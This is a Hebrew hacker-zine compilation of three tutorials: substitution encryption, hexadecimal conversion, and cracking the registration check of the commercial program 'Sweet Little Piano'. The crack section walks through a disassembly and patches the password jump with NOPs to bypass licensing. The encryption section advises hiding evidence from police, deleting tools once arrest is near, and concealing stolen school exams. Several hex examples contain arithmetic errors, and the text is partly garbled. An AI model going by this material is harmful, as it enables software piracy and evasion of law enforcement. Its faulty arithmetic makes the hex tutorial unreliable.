‫* מה זה הצפנה ?‬
‫* איך אני מצפין ?!?!‬
‫* למה זה טוב ?‬
‫* בטוח שלא יגלו את זה ?‬
‫* לינקים ‪.‬‬
‫* קרדיטים‪.‬‬
‫=============‬
‫מה זה הצפנה ?‬
‫=============‬
‫בתהליך הצפנה אתה בעצם משנה מה שאתה כתבת למשהו אחר‪ ,‬שזה נראה ממש זוועה‪ ,‬לא ברור‪.‬‬
‫אבל בעצם כל מה שכתבת נמצא שם רק זה השתנה כדי שאנשים לא מורשים (שוטרים) לא יקראו את‬
‫זה‪.‬‬
‫לכל אלגוריתם של הצפנה יש סוג הצפנה אחר‪ .‬למשל‪ ,‬התוכנה ‪ a‬איך היא מצפינה‪.‬‬
‫היא קבעה שכל אות בפה שלה תהיה משהו אחר‪:‬‬
‫‪ a‬תהיה בשפה שלה ‪,3‬‬
‫‪ b‬תהיה בשפה שלה ‪,6‬‬
‫‪ c‬תהיה בשפה שלה ‪,9‬‬
‫‪ d‬תהיה בשפה שלה ‪.12‬‬
‫אז איך היא תכתוב ‪ ? abcd‬היא תכתוב את זה ככה ‪.36912 :‬‬
‫זה לא חייב להיות ככה אבל זה בעצם הבסיס‪.‬‬
‫הצפנה הוא שינוי המקור אבל לא שינוי מלא‪ ,‬שינוי התוכן‪ ,‬התסרת התוכן ע"י תווים מוזרים‪.‬‬
‫כאשר אתה תפתח קובץ מוצפן כזה או אחר אתה תראה דבר שאתה לא תידע מהזה‪,‬‬
‫אתה תחשוב אולי שזה קובץ לא גמור‪ ,‬הרוס‪ ,‬סתם חירבוש אבל זה לא נכון‪.‬‬
‫דוגמא ‪ :‬זה טקסט שראיתי ברשת והוא היה מוצפן‪ ,‬תגידו לי מה הבנתם ממנו‪...‬‬
‫‪------------------------------------------------------‬‬‫‪.kasfona sfknasf sdifh@w#$)&@#$jtk wdrgp vsmv sdpog v12‬‬
‫‪------------------------------------------------------‬‬‫עכשיו מצאתי את סוג ההצפנה ופיצחתי את זה‪ ,‬רוצים לדעת מה יש בפנים ?‬
‫‪------------------------------------------------------‬‬‫‪.decrypt -> kasfona sfknasf sdifh@w#$)&@#$jtk wdrgp vsmv sdpog v12‬‬
‫‪.undecrypt -> its a very simple program to decrypt, i think u can do it‬‬
‫‪------------------------------------------------------‬‬‫נו מה הבנתם מזה ?‬
‫* הצפנה זה דבר נחמד‪ ,‬אבל רק כשאתה משתמש בו‪.‬‬
‫* לא קשה לפענח הצפנה רק צריך כלים טובים‪.‬‬
‫אני מקווה שהבנתם פה את הכללי ובואו נמשיך‪.‬‬
‫==================‬
‫איך אני מצפין ?!?!‬
‫==================‬
‫אוקי יש שתי דרכים שלדעתי הם עיקריות להצפין‪....‬‬
‫‪ .1‬לכתוב תוכנה שמצפינה את הכל לפני איך שאתה קובע (בתנאי שאתה כתבת אותה)‪.‬‬
‫‪ .2‬להשתמש בתוכנה אשר מישהו כבר כתב‪ ,‬רק שתדעו רוב התוכנות עושות את זה עם סיסמא‪.‬‬
‫אתה צריך לכתוב את הסיסמא הנכונה כדי שזה יפתח את ההצפנה‪.‬‬

‫הסברים‪:‬‬
‫‪ .1‬אם אתם כותבים תוכנה שמצפינה‪ ,‬איך היא צריכה להיות ?‬
‫אתה מגזיר למחשב שיבדוק איפה הוא מאתר את התתוים הבאים‪:‬‬
‫‪.*&^%$#@!+-.,abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789‬‬
‫ואז פשוט מאוד הוא מחליף אותם במה שאתם קובעים‪ ,‬למשל תקבעו ש ‪ a‬יהיה ‪ z‬הוא יעשה את זה‪.‬‬
‫&& אם תם רוצים לכתוב תוכנה שפותחת הצפנה שאתם עשיתי אז עושים ההיפך‪:‬‬
‫אתה מגזיר למחשב שיבדוק איפה הוא מאתר את התתוים האלה שנתת לו לשנות את התתוים‬
‫הרגילים‪.‬‬
‫למשל אמרת ש ‪ a‬זה ‪ ,z‬אז אתה אומר שכשהוא יראה ‪ z‬הוא ישנה את זה ‪.a‬‬
‫‪ .2‬אתם מחפשים תוכנה באינטרנט‪ ,‬אתם פותחים קובץ טקסט כלשהו ולוחצים על ‪,decrypt‬‬
‫הוא מבקש מכם סיסמא שתם קובעים‪ ,‬אתם מקישים ומאשרים‪ ,‬לאחר מכן הוא יוציא לכן קשקוש‬
‫אמיתי‪.‬‬
‫ועם אתה רוצים לפתוח את זה אתם לוחצים על ‪ ,undecrypt‬הוא מבקש סיסמא‪.‬‬
‫אם אתם מקישים את הנכונה יופי‪ ,‬אם לא אכלתם אותה‪.‬‬
‫אוקי אם תרצו לבדוק את זה לבד‪ ,‬תורידו או תבנו תוכנת קידוד והצפנה ותנסו‪ ,‬אם אתם לא‬
‫מאמינים לי ;=)‪.‬‬
‫============‬
‫למה זה טוב ?‬
‫============‬
‫זה משמ טוב להרבה דברים‪ ,‬כי זה בעצם מסמל את הפרטיות של כל הבני אדם‪.‬‬
‫בטוח קראתם את הכתבה שלי על ה ‪ fbi‬והציתות באתר של הארגון אז זה בעצם מנפץ את זה‪.‬‬
‫למשל יש לכם טקסט סודי ממש סודי ‪ ,‬על כל הדברים הלא טובים שעשיתם‪ ,‬הבולשת עושה פשיטה‪,‬‬
‫מוציאה את המחשב מוצאת הקובץ ‪ ,‬ולא מצליחה לפצח אותו‪ ....‬לא קרה כלום לא נדפקת ולא כלום‪.‬‬
‫אבל יש פה בעיה קטנה‪ ...‬שאם תעבדו אם תוכנה שכבר כתובה יש סיכוי שאיזה פלצן בבולשת יגלה‬
‫אותה‬
‫ויפתח את הקובץ בלי בעיות אז אכלצם אותה‪ .‬אז מה אני מעייץ ?‬
‫לכתוב תוכנה לבד‪ ,‬לשים שם את הקידוד הכי נוראי שאפשר (מבחינה טובה) שאף אחד לא ידע‪.‬‬
‫שיהיה לך איפשהו כמו מין מפת תווים שתידע מה זה מה‪.‬‬
‫אחרי שאתה מכין תוכנה ואתה בסכנה (יש לך תיק ‪ ,‬צו מעצר) אני מייעץ למחוק את התוכנה‪,‬‬
‫כדי שלא יהיה להם איך לפתוח את הקובץ ואל תפיץ אותה כי אתה מגדיל סיכוי להידפק‪.‬‬
‫תקעו איפשהו מפת תווים שתידעו אחרי איך לכתוב תוכנה אנטי‪ ,‬שתפתח את ההצפנה‪.‬‬
‫זה טוב לעוד דברים‪:‬‬
‫‪ .1‬להסתיר מידע סודי עליכם או על מישהו אחר‪.‬‬
‫‪ .2‬כתבתם מכתב אהבה לילדה ואתם לא רוצים שיראו אותו עד שתשלח לה אותו (איזה חמוד ‪. )):‬‬
‫‪ .3‬גנבתם מבחן מהמחשב בבית ספר ולא רוצים שיגלו אותכם בבית‪ ,‬וואלה‪.‬‬
‫ועוד הרבה הרבה דברים אחרים‪.‬‬
‫=====================‬
‫בטוח שלא יגלו את זה ?‬
‫=====================‬
‫תשמעו אני לא יכול להבטיח שלא יגלו את זה ‪ ,‬זה תלוי איך כתבתם ובאיכות של התוכנה‪.‬‬
‫אם תכתבו תוכנה שלוקחת אות ומזיזה אותה תו אחד בטווח זה לא טוב‪ ,‬למשל אמרת ש ‪ b‬יהפוך ל ‪.c‬‬
‫זה ממש קל לגלות אבל אם משהו אחר‪ ,‬תנסו לעשות את זה כמה שיותר מסובך ורחוק בטווח‪.‬‬
‫למשל ש ‪ a‬יהיה ‪ w‬או משהו כזה‪.‬‬
‫אני לא יכול שוב להבטיח שלא יגלו מה בפנים‪ ,‬כמו שאני לא יכול להבטיח שלא יפרצו לכם למחשב‬
‫מתישהו או שלא יתפסו אתכם אם תפרצו לאתר‪ ,‬לא תמיד יתפסו אבל אני ואף אחד אחר לא יכול‬
‫להבטיח‬
‫שלא‪.‬‬

‫מבינים מה אני אומר‪ ,‬זה עניין של סיכון‪.‬‬
‫לדעתי האישית תעבדו רק אם תוכנות שאתם כתבתם‪ ,‬ואם יש לכם בעיות אז קחו את התוכנה שיש‬
‫למטה‪,‬‬
‫ותשנה את המבנה שלה‪.‬‬
‫אבל בחיים‪ ,‬אבל בחיים אם אתם יודעים שיש סיכוי שאיזה שוטר יבוא לקחת את המחשב שלכם‬
‫איזה יום‪,‬‬
‫אל תשתמשו בתוכנות כתובות ותוכנות דפוקות‪.‬‬
‫========‬
‫לינקים ‪.‬‬
‫========‬
‫אתרים על קידוד והצפנה אפשר למצוא בכל חור ברשת‪ ,‬אבל מה מיוחד בטקסט שלי ‪? 9-:‬‬
‫אני נותן לכם פה קישור לתוכנה שהיא בעצם תוכנת הצפנה‪ ,‬שנכתבה ע"י בן אדם מאוד חכם (לא אני)‪.‬‬
‫אז אם אתם רוצים קחו אותה‪ ,‬תקמפלו אותה ותבלו איתה‪.‬‬
‫כל זאת כמה לינקים לכיף ‪:‬‬
‫‪www.astalavista.com‬‬
‫‪hack.box.sk‬‬
‫‪blacksun.box.sk‬‬
‫‪by pirs[i]ng‬‬

‫בסיס הקסדצימלי ‪ -‬המרה‬
‫מאת ‪zeos :‬‬
‫במדריך זה תלמד איך להמיר מבסיס הקסדצימלי לעשרוני ולהפך ‪ .‬לא סיפור גדול ‪ ,‬אבל חשוב שתדע‬
‫כדי לבצע דברים מורכבים יותר בעתיד‪ .‬המדריך הזה הוא רק חלק ממדריך ענק של בסיס‬
‫הקסדצימלי שאני ימשיך להכין אם יהיה לי כוח ‪):‬‬
‫}מדריך זה נכתב לצורכי לימוד בלבד ‪ -‬האחריות לשימושו עלייך בלבד {‬
‫יאללה!‬
‫מה זה הקסדצימלי ?‬
‫הקסדצימלי הוא בסיס ‪ ,16‬מה זה בסיס אתה שואל ובכן בסיס הוא הגורם שאותו מעלים בחזקה‪ .‬אני‬
‫יודע שאני קצת סוטה מהנושא אבל בצורה מתמטית פשוטה בסיס זה כמו ה ‪ x‬כאן ‪ xa :‬וה ‪ a‬הוא‬
‫המעריך שלו ‪ .‬אז כן אם הבנת נכון ‪ -‬הקסדצימלי הוא בסיס ‪ 16‬ו ה‪ a-‬הוא המעריך שלו‪ ,‬תלמד‬
‫חזקות ושוב לפה‪.‬‬
‫אוקיי פירוש למילה הקסדצימלי (‪ )hexadecimal‬הוא בעצם מיוונית ‪ hexa -‬שזה ‪ 6‬ו ‪ decimal‬שזה‬
‫‪ - 10‬דצימלי הוא הבסיס המוכר לכולנו ‪ -‬בסיס ‪ , 10‬עשרוני‪ .‬וכמו כן יש גם את הבסיס בינארי ‪ -‬בסיס‬
‫‪ 2‬שהוא הבסיס הבסיסי ביותר ומשתמשים בו בגלל העובדה שמחשב יכול לקלוט רק אותות חשמליים‬
‫של כבוי ודלוק ולכן ‪ 0‬ו ‪ 1‬שהם המספרים היחידים בבסיס זה מועברים למחשב‪ .‬בבסיס ה‬
‫הקסדצימלי משתמשים כדי לשנות פקודות ועוד דברים משום העובדה שהוא נוח לעבודה דרך שפת‬
‫סף (אסמבלר) כי רוב הפקודות בה מתורגמות למספרים הקסדצימליים פשוטים יחסית (עוד פרטים‬
‫במדריך אסמבלר) ‪.‬‬
‫שיטות ספירה‬
‫טוב ‪ ,‬עכשיו נכון שכאשר אתה סופר רגיל אתה סופר כך ‪:‬‬
‫‪... 10 ,9 ,8 ,7 ,6 ,5 ,4 ,3 ,2 , 1‬‬
‫זאת שיטת הספירה המקובלת הנקראת גם השיטה העשרונית או הדצימלית‪.‬‬
‫אוקיי עכשיו למה הבלטתי את ‪ 9‬ו ‪ ! ? 10‬זאת משום שבנקודה הזאת בעצם המספר מקבל עוד ספרה‬
‫מצד שמאל ומתאפס מחדש‪ .‬כך גם בבסיס הקסדצימלי ‪ .‬כמו שבעשרוני אנו סופרים עד ‪ 9‬ואז‬
‫מוסיפים לעשרות ‪ 1‬ומאפסים את היחידות (וזאת משום שמבחינה תיאורטית אין כזה דבר "עשר‬
‫אחדות" אלא יש "אחד עשרות") ‪.‬‬
‫בקיצור ‪ ,‬בהקסדצימלי זה דומה ‪ -‬אתה סופר עד ‪ 15‬ואז מוסיף אחד לספרה שמאלית רק‬
‫שבהקסדצימלי הספרה השמאלית שווה לכפולות של ‪ 16‬ולא לכפולות של ‪.10‬‬
‫לא הבנת ‪ ,‬לא נורא עוד מעט תבין‪ .‬עכשיו בהקסדצימלי סופרים עד ‪ 9‬כרגיל ואז מ ‪ 10‬ועד ‪ 15‬ישנם‬
‫אותיות כדלקמן‪:‬‬
‫עשרוני ‪ -‬הקסדצימלי‬
‫‪1-1‬‬
‫‪2-2‬‬
‫‪3-3‬‬
‫‪4-4‬‬
‫‪5-5‬‬
‫‪6-6‬‬
‫‪7-7‬‬
‫‪8-8‬‬
‫‪9-9‬‬
‫‪a - 10‬‬
‫‪b - 11‬‬
‫‪c - 12‬‬
‫‪d - 13‬‬
‫‪e - 14‬‬

‫‪f - 15‬‬

‫‪!let the game begin‬‬
‫נגיד שהבנת איך זה הולך אז בוא נתחיל להמיר מ הקסדצימלי לעשרוני כי זה יותר קל‪.‬‬
‫טוב הסתכל בטבלה הבאה שמייצגת את המספר ‪ 12‬בבסיס הרגיל (עשרוני) ‪:‬‬
‫‪1000000‬‬

‫‪100000‬‬

‫‪10000‬‬

‫‪1000‬‬

‫‪1‬‬
‫‪10‬‬

‫‪100‬‬

‫‪2‬‬
‫‪1‬‬

‫כמו שבוודאי הספקת להבין בטבלה הזאת מוצג המספר ‪ 12‬כאשר הוא מחולק ל ‪ 1‬עשרות ועוד ‪2‬‬
‫יחידות ‪ ,‬פשוט וקל ‪ .‬וכן גם שים לב שככל שהולכים בטבלה התחתונה שמאלה כך גם נכפל המספר‬
‫בעשר ‪ ,‬כלומר שכל מספר הוא כפולה של עשר בעצמו ‪ -‬חזקה שלו ‪ .‬ככה ש ‪ 1‬זה עשר בחזקת ‪ 0‬ועשר‬
‫זה עשר בחזקת אחד ‪ ,‬ומאה זה עשר בחזקת ‪. 2‬‬

‫אותו סיפור גם בהקסדצימלי ‪:‬‬
‫‪65536‬‬

‫‪4096‬‬

‫‪256‬‬

‫‪16‬‬

‫‪1‬‬

‫נגיד וננסה לכתוב את המספר בהקסדצימלי (שים לב ש ‪ 12‬הוא ‪ c‬לפי הטבלה למעלה) זה אמור‬
‫להראות כך‪:‬‬
‫‪65536‬‬
‫כי בעצם כופלים אותו בעצמו‪.‬‬
‫בוא נלך על מספר טיפה יותר גדול ‪ :‬המספר ‪ 2a‬שבעשרוני זה ‪44‬‬
‫למה? בוא ותראה ‪ ,‬בעצם אפשר לחלק את ‪ 2a‬ככה ‪:‬‬
‫‪65536‬‬

‫‪4096‬‬

‫‪256‬‬

‫‪4096‬‬

‫‪256‬‬

‫‪16‬‬

‫‪c‬‬
‫‪1‬‬

‫‪2‬‬
‫‪16‬‬

‫‪a‬‬
‫‪1‬‬

‫אז מה בעצם יש כאן ? בשביל לקבל את התוצאה מה נעשה בדיוק כפי שעושים בעשרוני ‪ -‬ניקח את ‪12‬‬
‫הקודם זה בעצם ‪ 10 * 1‬ועוד ‪. 1 * 2‬‬
‫אז פה המספר ‪ 2a‬זה יהיה ‪ 16 * 2‬שזה ‪ 32‬ועוד ‪ a * 1 - a‬זה בעצם ‪10‬‬
‫אז זה שווה ל ‪ 10 * 1‬כלומר ‪ 10 + 32 :‬שזה שווה ל ‪42‬‬
‫מסובך ? אולי השרטוט הזה יעזור לך ‪:‬‬
‫ניקח את ‪ 42‬בעשרוני ונגלה שהוא שווה ל‪:‬‬
‫‪40 = 10 * 4‬‬
‫‪2=1*2‬‬
‫‪42 = 2 + 40‬‬
‫עכשיו ניקח את ‪ 2a‬בהקסדצימלי ונגלה שהוא שווה ל‪:‬‬
‫‪32 = 16 * 2‬‬
‫‪ - a = 10‬לפי הטבלה‬
‫‪10 = 1 * 10‬‬

‫‪42 = 10 + 32‬‬
‫בוא וקח דוגמאות אחרות ‪:‬‬
‫‪= 86a‬‬
‫‪a * 1 = 10‬‬
‫‪96 = 16 * 6‬‬
‫‪2048 = 256 * 8‬‬
‫‪2154 = 2048 + 96 + 10‬‬
‫כלומר ‪86a = 2154 :‬‬

‫‪4c91‬‬
‫‪1=1*1‬‬
‫‪144 = 16 * 9‬‬
‫‪c * 256 = 3072‬‬
‫‪16384 = 4096 * 4‬‬
‫‪19601 = 16384 + 3072 + 144 +1‬‬
‫כלומר ‪4c91 = 19601‬‬
‫המרה מעשרוני להקסדצימלי‬
‫עכשיו העסק אמור להיות קל אם הבנת את החלק שלמעלה ועברת את כיתה ג' ‪:‬‬
‫בשביל להמיר מעשרוני להקסדצימלי מה שעושים זה פשוט‪ ,‬לחלק את המספר ב ‪ , 16‬למה ב‪?16 -‬‬
‫עקרון ההמרה שיוסבר כאן הוא פשוט פירוק ספרות ולאחר מכן שרשור שלהם ביחד ( "לחבר" אותם ‪-‬‬
‫נגיד ‪ 1‬ו ‪ 2‬יהפכו להיות ‪ , ) 12‬בסדר נחזור למספר ‪ 12‬העשרוני שלנו‪:‬‬
‫תחלק אותו ב ‪ 10-‬ותקבל‬
‫‪)2(1 = 10 / 12‬‬
‫‪)1( 0 = 10 / 1‬‬
‫בסדר‪ 99% ...‬שלא הבנת כלום ‪ ,‬מה שקורה למעלה הוא בדיוק מה שהסברתי ‪ -‬פירוק המספר‬
‫והשארית שלו היא המספר עצמו ‪....‬‬
‫‪ 12‬חלקי ‪ 10‬קיבלת ‪ 1‬ושארית ‪ 2‬מה שניתן לתרגום כ ‪ 1‬עשרות ו ‪ 2‬יחידות‬
‫לאחר מכן "שמרת" את ה‪ 2 -‬זאת השארית וחלקת את ה ‪ 1‬שקיבלת שחילקת ב ‪ 10‬ממקודם וקיבלת ‪0‬‬
‫ושארית של ‪ 1‬מה שאומר ‪ 1‬עשרות‪.‬‬
‫‪ 2‬יחידות ו ‪ 1‬עשרות ‪12 -‬‬
‫די מסובך להסביר את זה ככה‪ ...‬אם לא הבנת ככה הנה עוד שיטה ‪ :‬בעצם בהמרה עשרונית אתה‬
‫מחלק‬
‫ב ‪ 0 1-‬עד שאתה מקבל במספר ‪ 0‬ובשארית את המספר שחילקת עליו בעשר (‪ 1‬במקרה שלנו) ואז כל‬
‫פעם שאתה מחלק את השארית אתה שומר וממשיך לחלק וכל מספר שמתווסף אתה מחבר משמאל‬
‫למספר כך שקיבלת בהתחלה בשארית ‪ 2‬ואחר כך ‪ - 1‬שרשר אותם (לשים אותם אחד ליד השני)‬
‫ותקבל ‪12‬‬
‫אוקיי איך הדבר עובד בבסיס ‪? 16‬‬
‫נגיד המספר העשרוני הבא ‪22 :‬‬
‫מה נעשה אתו ? בדיוק מה שעשינו בעשרוני רק שעכשיו נחלק ב ‪ 16‬ולא ב‪!10 -‬‬
‫‪)6( 1 = 16 / 22‬‬

‫‪)1( 0 = 16 / 1‬‬
‫אוקיי ‪ 6‬ו ‪ - 1-‬שרשר וקיבלת ‪16‬‬
‫דוגמית אחרת ‪58 :‬‬
‫‪)10( 3 = 16 / 58‬‬
‫‪)3( 0 =16 / 3‬‬
‫‪ 10‬בהקסדצימלי זה ‪ a‬מה שיתקבל בסוף הוא ‪3a‬‬
‫דבר חשוב מאוד למי שמשתמש במחשבון כאשר תנסה לחלק ‪ 58‬ב ‪ 16‬תקבל ‪ 3.625‬או בשברים ‪ 3‬ו ‪5‬‬
‫חלקי ‪ , 8‬עכשיו תשים לב שכאשר אתה מחפש את השארית כדי לכתוב אותה בצורה עשרונית אתה‬
‫חייב להפוך את המכנה ל ‪ 16‬מה שבמקרה שלנו לכפול את המכנה והמונה של ‪ 5‬חלקי ‪ 8‬ב ‪ 2-‬ואז‬
‫תקבל ‪ 10‬חלקי ‪ . 16‬וזאת התשובה לשארית ולא ‪.5‬‬
‫לידע כללי ‪ ,‬העיקרון פועל גם בעשרוני כי הרי נגיד שאתה רוצה לכתוב את השבר חצי (‪ 1‬חלקי ‪) 2‬‬
‫בעשרוני כאשר הוא תחת בסיס עשר‪ ,‬אז אתה חייב לכפול את המונה והמכנה ב ‪( 5 -‬כי ‪ 5 * 2‬שווה ל‬
‫‪ ) 10‬ואז אתה מקבל ‪ 0.5‬אותו דבר בדיוק קורה גם ב הקסדצימלי כי אתה חייב "לכתוב את המספר"‬
‫תחת בסיס ‪ 16‬ולא תחת בסיס אחר‪.‬‬
‫דברי סיכום‪:‬‬
‫במדריך זה למדת (אם הצלחת) איך להמיר מבסיס ‪ 10‬לבסיס ‪ 16‬ולהפך‪ .‬אני יודע שזה לא סיפור גדול‬
‫אבל אתה תראה שזה יכול להשתלם לך אם תחליט ללמוד אסמבלר באופן מלא ‪,‬כמובן שאפשר פשוט‬
‫להשתמש בממיר בסיסים שניתן להוריד כמעט מכל מקום אבל אפילו המפצחים המנוסים ביותר‬
‫נוהגים יותר להתעסק עם זה לבד כי זה יותר מאתגר כנראה וגם כמו שכתוב בהתחלה זה בסיס‬
‫לדברים יותר מורכבים‪.‬‬
‫במדריך הבא שלי (על הקסה) אכתוב כיצד ניתן לחבר ‪ ,‬לחסר לכפול או לחלק מספרים מבסיס ‪16‬‬
‫‪( .‬ותלמד גם על חשיבות המספרים השליליים והמשלימים ל ‪( 2‬המדריך מסתמך על ידע בבסיס בינארי‬
‫‪by zeos‬‬

‫המדריך לפיצוח מעשי של הגנת סיסמא‬

‫מאת‪zeos :‬‬
‫שלום לכם‪ ,‬זהו כבר המדריך השני שאני כותב בנוגע לקראקינג ‪ .‬בעקבות הודעות שהשאירו לי בפורום‬
‫בנוגע לפיצוח הגנת סיסמא החלטתי לכתוב את מדריך זה וכן גם בשביל שממש תוכל להתנסות ולפצח‬
‫תוכנית אמיתית‪.‬‬
‫הערה‪ :‬המדריך נוצר לצורכי לימוד בלבד! ‪ ,‬כל פעולה לא חוקית שתעשה או כל נזק שיגרם למחשבך‬
‫עקב כל פעילות על סמך המדריך הנה על אחריותך בלבד!‪ ,‬המדריך מוסבר בצורה תיאורטית וכל‬
‫פעולה לא חוקית שתנקוט כתוצאה מכל סוג של שימוש הנה על אחריותך האישית בלבד‪ .‬אם אתה‬
‫מעוניין לנצל את הפיצוח למטרות רווח אנא הפסק לקרוא‪.‬‬
‫חלק ‪ - 1‬הכלים והידע‬
‫טוב ‪ ,‬אז למדריך הזה אתה חייב (!) ידע באסמבלי ‪ ,‬בלי ידע אתה תתקע‪ ...‬עדיף שתלמד מספרים או‬
‫באינטרנט קצת ואז חזור לכאן (רק ידע בסיסי למדריך זה ‪ ,‬עדיף שתדע קצת על אוגרים‪ ,‬פונקציות‬
‫השוואה ובסיסים)‪.‬‬
‫הכלים שנשתמש הם כלים די נפוצים‪:‬‬
‫‪ w32.1‬דיסאמבלר מעולה חובה בכל בית בישראל ‪):‬‬
‫‪ )hworks )hex workshop.2‬עורך הקסדצימלי (מציג את הקבצים בבסיס ‪ )16‬אם אתה יודע‬
‫להשתמש טוב בכל עורך אחר‪ ,‬בבקשה‪.‬‬
‫ניתן להשיג את הקבצים כמעט בכל מקום באינטרנט‪...‬‬
‫חלק ‪ - 2‬המטרה‬
‫בשביל שלא יהיה קשה ‪ ,‬סיירתי באתרי קראקינג ומצאתי קובץ די נפוץ שמלמדים עליו איך לפרוץ ‪.‬‬
‫תוכנה ממש קלה וחביבה שלמפצח הבינוני לא צריך לקחת יותר מ ‪ 5‬דקות לפצח‪.‬‬
‫לתוכנה קוראים ‪ sweet little piano :‬וניתן להוריד אותה מהכתובת הבאה‬
‫‪http://www.ronimusic.com/swlipi32.zip‬‬
‫חלק ‪ - 2‬בדיקת הודעות מערכת‬
‫קדימה לעבודה! ‪ ,‬אחרי שהרצנו את התוכנה לראשונה נפתחו לנו ‪ 2‬דברים ‪ :‬בהתחלה תיבת הודעה‬
‫שאומרת ‪:‬‬
‫‪note! you must supply your user id when ordering‬‬
‫‪user id: xxxx‬‬
‫ש ‪ xxxx‬הוא המספר רשיון שלך‪ .‬אחרי שתלחץ על ‪ ok‬יפתח לך מסמך ‪ order.txt‬וכן גם תיבה‬
‫המבקשת את הסיסמא שלך שבה רשום בכותרת "‪ ”enter your password‬ומקום להכניס‬
‫סיסמא‪ .‬הקש משהו שטותי כל מספר שעולה על דעתך ואמורה להיפתח לך הודעת שגיאה (כמה לא‬
‫מפתיע) שבה רשום‬
‫‪ not a valid password‬ובכותרת רשום‬
‫ ‪user id xxxx sweet little piano‬‬‫הקלק על ‪ ok‬שוב ותכנס לגרסה הלא מלאה של התוכנית‪.‬‬
‫אז מה היה לנו כאן ‪:‬‬
‫התוכנית פתחה לך מקום לרשום סיסמא בהתאם למספר זיהוי שהונפק לך (‪ )user id‬ולאחר מכן‬
‫להשוות באמצעות אלגוריתם מסוים את הסיסמא למספר זיהוי ‪ ,‬אך אתה שמת מספר לא נכון‬
‫וקיבלת הודעת שגיאה ‪.‬‬
‫חלק ‪ - 3‬בודקים את הקוד‬
‫טוב ‪ ,‬בוא נראה מה קורה בתוך התוכנית‪ :‬פתח את ‪ w32‬ופתח בו את קובץ ה ‪ exe‬של התוכנית‪...‬הנה‬
‫אחת הסיבות למה בחרתי דווקא את התוכנית הזאת ‪ -‬היא קטנה מה שאומר שכנראה יהיה לנו פחות‬

)‫ (ליד הכפתור של ההדפסה‬strn.ref ‫ בוא נלחץ על‬- ‫ עכשיו קלטו מה נעשה‬. ): ‫בלגן להתעסק וזה טוב‬
not a valid :‫ונחפש את השורה שמראה לנו כי הבדיקה לא נכונה כלומר את המשפט‬
password
:‫מצאנו? יופי לחצו עליו ואמור להיפתח לכם משהו כזה‬
* reference to: user32.getdlgitemtexta, ord:0000h
|
:00401e54 e8ebba0000
call 0040d944
:00401e59 e83efeffff
call 00401c9c
:00401e5e 85c0
test eax, eax
:00401e60 741e
je 00401e80
:00401e62 6a30
push 00000030
1possible stringdata ref from data obj ->”sweet little piano”
|
:00401e64 68fce14000
push 0040e1fc
1possible stringdata ref from data obj ->”thanks for registering!”
|
:00401e69 68ade14000
push 0040e1ad
:00401e6e 53
push ebx
1reference to: user32.messageboxa, ord:0000h
|
:00401e6f e812bb0000
call 0040d986
:00401e74 c70568e2400001000000 mov dword ptr [0040e268], 00000001
:00401e7e eb1a
jmp 00401e9a
1referenced by a (u)nconditional or ©onditional jump at address:
|:00401e60©
|
:00401e80 6a30
push 00000030
1possible stringdata ref from data obj ->”sweet little piano”
|
:00401e82 68fce14000
push 0040e1fc
1possible stringdata ref from data obj ->”not a valid password!”
|
:00401e87 68e3e14000
push 0040e1e3
:00401e8c 53
push ebx

‫ אז בוא ותראה מה‬, ‫אחרי שהתאוששת מהבלגן הזה והצלחת למצוא את הקטעים עליהם אני מדבר‬
‫ לפי השיגרה‬:‫קורה לנו פה‬
* reference to: user32.getdlgitemtexta, ord:0000h

‫}קריאה לפונקציה { ‪call 0040d944‬‬
‫} קריאה לפונקציה{ ‪call 00401c9c‬‬
‫}מבחן השוואה( ‪test eax, eax‬‬
‫} !קפיצה אם שווה{ ‪je 00401e80‬‬
‫‪00401e62 6a30‬‬
‫‪push 00000030:‬‬

‫|‬
‫‪:00401e54 e8ebba0000‬‬
‫‪:00401e59 e83efeffff‬‬
‫‪:00401e5e 85c0‬‬
‫‪:00401e60 741e‬‬

‫ישנם ‪ 4‬משפטים ‪ ,‬משפטים אחד ושתיים קוראים לפונקציה ‪ ,‬לא מעניין‪ .‬משפט שלישי עורך מבחן‬
‫מסוים בין שני האוגרים ‪ eax‬אבל זה לא כל כך משנה לנו כי זה פיצוח אלגוריתם של הסיסמה ואנחנו‬
‫לא מתעסקים עם זה כעת ואילו במשפט הרביעי (מסומן בירוק) ישנה קפיצה אם שווה ‪ -‬זה ‪ je‬לשיגרה‬
‫שאומרת כי ההרשמה הצליחה‪ .‬עכשיו בוא נחשוב ‪ ,‬מה היה קורה אילו התוכנית הייתה עושה מבחן‬
‫השוואה והפקודה ‪ je‬לא הייתה שם? אז התוכנית הייתה נרשמת בהצלחה‪ .‬אז יאללה קדימה בוא נלך‬
‫ונשמיד אותה!!!!‬
‫חלק ‪ - 4‬נטרול פקודת ההשוואה‬
‫אם קראת את המדריך הראשון שלי תראה כי גם פה אני מנטרל את פקודת ההשוואה באמצעות‬
‫פקודת ‪nop‬‬
‫= ‪ , no operation‬אבל יש בעיה קטנטנה ומעצבנת שפקודת ‪ je‬תופסת שני בתים ופקודת ‪nop‬‬
‫תופסת בייט אחד ‪ ,‬ולכן נכניס רק ‪ 2‬פקודות ‪ nop‬ולא ארבע כמו שעשינו במדריך הקודם‪.‬‬
‫שים לב לטיפשות של המתכנת ‪ ):‬שעשה "מספר סידורי" כדי שתתבלבל ולא תמצא את השיגרה‪,‬‬
‫אל תדאג אם מספרי השורות בדיסאמבלר שלך לא שוות למה ששלי‪ ...‬פשוט עקוב אחרי משפטי‬
‫התוכנית שבראש (מסומנים בכחול) ותמצא אותם בהתאם ל"מספר סידורי" שלך‪.‬‬
‫אז בדוק ב ‪w32‬שלך את המספר ‪ offset‬של הפקודה ‪ je‬שלך (שוב פעם‪ ,‬אל תתייחס אם זה לא דומה‬
‫לשלי) ולאחר שרשמת אותו (ללא ה ‪ ) h -‬לך לעורך ההקסדצימלי שלנו ‪. hworks‬‬
‫קדימה קפוץ לשורה באמצעות פקודת ‪( goto‬אלט ו‪ ) f5‬אל המספר שרשמת והקלד פעמיים ‪( 90‬זאת‬
‫הפקודה ‪ nop‬בהקסדצימלי) ‪ .‬שמור את הקובץ‪...‬‬
‫חלק ‪ - 5‬פיצחתי ! פיצחתי!! אני גבר!!!‬
‫תפעיל את התוכנית ואם עשית הכל נכון תראה שלא משנה איזה מספר תקיש ההרשמה תהיה חוקית‪.‬‬
‫מזל טוב ‪ ,‬אני אישית גאה בך שפיצחת את התוכנית הראשונה שלך ‪ -‬רוץ בכל הבית ותצעק "פיצחתי !‬
‫פיצחתי!" כמו שאני עשיתי בפעם הראשונה שהצלחתי ‪):‬‬
